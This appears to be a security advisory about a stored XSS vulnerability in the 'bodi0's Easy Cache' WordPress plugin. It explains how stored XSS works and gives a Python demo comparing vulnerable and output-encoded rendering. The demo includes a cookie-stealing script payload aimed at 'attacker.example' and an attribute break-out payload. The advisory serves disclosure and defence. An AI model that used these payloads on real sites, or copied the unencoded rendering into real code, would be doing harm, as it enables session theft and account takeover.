Stored XSS Vulnerability in bodi0’s Easy Cache Plugin

Updated: November 12th, 2024

Product Name: bodi0’s Easy Cache
Vulnerability: Stored XSS
Vulnerable Version: Will be disclosed soon
CVE: Will be disclosed soon


On September 16, 2024, the pentesting team at Astra Security found a stored Cross-Site Scripting (XSS) vulnerability in bodi0’s Easy Cache, a WordPress plugin that adds page caching to speed up page loads and reduce server load.

A stored XSS vulnerability occurs when an application saves attacker-controlled input without sanitization and later renders it, without output encoding, into pages viewed by other users of the application.

How Does a Stored XSS Vulnerability Occur?

Stage 1: Injection

The attacker first injects a malicious script into the application through any input the application persists, such as form fields or plugin settings, or by uploading a file that carries the payload.

Stage 2: Storage

The application writes the payload into its persistent storage, typically a database table or a file on disk, or, less commonly, into a cookie or server-side session record that is later rendered back into a page.

Stage 3: Retrieval and Execution

Each time any user loads the page that renders the stored value, the browser executes the script in the context of the site’s origin and with that user’s session.

Consequences include:

  • Theft of session tokens or other sensitive data reachable from script, such as cookies not flagged HttpOnly, local storage, or the contents of the page itself.
  • Redirecting valid users to attacker-controlled websites to phish credentials or other sensitive information.
  • Running arbitrary JavaScript in the victim’s browser to perform actions as that user (for an administrator, that can mean changing site settings), harvest sensitive information, or push the victim toward malware/ransomware downloads.

Impact of Stored XSS Vulnerability

1. Session Compromise

After a successful injection, attackers can target any users who visit the affected page, causing issues like Cookie Theft or Session Hijacking, where user session information is stolen and a valid user is impersonated. This can also lead to account takeovers.

2. Malware and Ransomware Propagation

Unlike reflected XSS, stored XSS is persistent and can be used for malware and ransomware deployment. Once the payload is stored, malicious scripts affect any user accessing the vulnerable page.

3. Website Defacement

Malicious scripts can modify the content of web pages, presenting misleading information or making it hard for users to distinguish legitimate content from injected content. Attackers can also inject advertisements into the pages, disrupting the user experience.

Current Status

Upon discovering the vulnerability in bodi0’s Easy Cache plugin, we promptly notified the plugin’s developers and provided possible fixes, such as input sanitization and server-side output encoding (HTML encoding) of every stored value at the point where it is rendered, that they can implement to prevent exploitation.

Currently, they are working on implementing a patch while formulating a long-term solution for the vulnerability.
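The three stages above and the output-encoding fix suggested to the developers, as an added example in Python that is not the plugin’s code: an in-memory SQLite table stands in for the plugin’s settings storage, the two payloads are constructed for the demonstration, and the vulnerable renderers concatenate the stored value straight into HTML while the hardened ones encode it for the context it lands in (the WordPress equivalents are esc_html() for body text and esc_attr() for attribute values).

```python
"""Stored XSS in three stages, with the output-encoding fix.

Constructed example: the storage table, field name and payloads are assumptions
for the demonstration, not taken from the plugin.
"""
import html
import sqlite3

# Stage 1: injection. Two constructed attacker payloads, one per output context.
BODY_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def new_store():
    """Stage 2: storage. An in-memory SQLite table stands in for the plugin's settings storage."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE settings (name TEXT PRIMARY KEY, value TEXT)")
    return conn


def save_setting(conn, name, value):
    """Persist the raw value, as a plugin that does not sanitize input would."""
    conn.execute("INSERT OR REPLACE INTO settings (name, value) VALUES (?, ?)", (name, value))
    conn.commit()


def load_setting(conn, name):
    row = conn.execute("SELECT value FROM settings WHERE name = ?", (name,)).fetchone()
    return row[0] if row else ""


# Stage 3: retrieval and execution. The stored value is concatenated into HTML
# with no encoding, so whatever was saved runs in every viewer's browser.
def render_body_vulnerable(conn):
    return "<p>Cache note: " + load_setting(conn, "note") + "</p>"


def render_attr_vulnerable(conn):
    return '<input type="text" name="note" value="' + load_setting(conn, "note") + '">'


# Fix: encode at output time for the context the value lands in. html.escape with
# quote=True turns < > & " ' into entities, which neutralises both a tag in body
# text and a quote break-out inside a double-quoted attribute.
def render_body_hardened(conn):
    return "<p>Cache note: " + html.escape(load_setting(conn, "note"), quote=True) + "</p>"


def render_attr_hardened(conn):
    return '<input type="text" name="note" value="' + html.escape(load_setting(conn, "note"), quote=True) + '">'


def demo():
    """Run both payloads through the vulnerable and hardened renderers."""
    conn = new_store()
    results = {}
    save_setting(conn, "note", BODY_PAYLOAD)
    results["body_vulnerable"] = render_body_vulnerable(conn)
    results["body_hardened"] = render_body_hardened(conn)
    save_setting(conn, "note", ATTR_PAYLOAD)
    results["attr_vulnerable"] = render_attr_vulnerable(conn)
    results["attr_hardened"] = render_attr_hardened(conn)
    return results


if __name__ == "__main__":
    for label, markup in demo().items():
        print(f"{label}: {markup}")
```

Encoding belongs at the output step because the same stored value may be rendered in several contexts; sanitizing on input (in WordPress, wp_kses_post() for fields that legitimately carry HTML) is a useful second layer but does not replace it.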

What can you do?

Update the plugin to the patched version as soon as the bodi0’s Easy Cache team releases it.